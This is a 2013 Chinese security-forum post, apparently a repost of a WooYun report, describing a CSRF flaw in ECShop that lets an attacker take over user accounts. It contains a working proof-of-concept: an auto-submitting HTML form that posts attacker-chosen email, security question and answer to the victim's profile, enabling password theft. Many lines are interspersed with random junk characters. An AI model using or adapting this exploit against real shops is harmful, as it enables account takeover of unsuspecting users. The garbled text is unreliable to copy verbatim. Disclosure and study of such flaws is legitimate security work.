找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1934|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:* l2 S* E$ {$ x7 j' _4 s6 q4 p9 [
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
) G% Y3 C  D4 R# p  V
/ g# L6 d" o1 v& s1 H& s! SDemo For:http://www.wooyun.org/bug.php?action=view&id=3953 t8 S0 O9 \2 \2 J% {% W; j2 e
- u: ]3 v) a/ h4 p+ |9 N  f% o
详细说明:
# O9 s& B3 t+ M5 l$ I利用csrf和xss可以突破官方所说的“障碍”
2 \! v3 a2 A, b9 A3 t0 k" b! Txss版本已经有人说明+ ]0 ?# J# O: B4 P0 r. O- P, l* m
这里给出csrf版本
' U8 z2 W$ E' X8 `* k* G
! N( K, v; q! m, ~+ ]+ G6 N7 I漏洞证明:. K" B, D. T  W, o1 J
<html>
( ?" a7 ]# N1 f; G' f8 P/ E<body>
4 j7 m6 k# C* B- q7 g0 G9 b<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
. e9 T( G- X% `" ?6 O+ o<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
9 ]  @0 j; u9 y2 ~<INPUT TYPE="text" NAME="act" value="act_edit_profile">
+ Y% i+ c0 M( C3 U( g" D<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 @2 s* K( y3 W* j
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">+ s$ q4 }, i; N7 h6 O! l
</body>
6 |! q. d. h  y0 S<script>& W' }% e* y5 e, s$ F
document.forms[0].submit();
3 U3 Q5 }9 \- P$ J/ ?. Q  @</script>; A2 |  D1 F) o! e5 w4 m
</html>
# t7 k5 o( U9 c  P) S! S* D3 E, {构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
& U+ E" Z8 J! w, B  y; ?5 w! p3 x  _% c5 H3 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表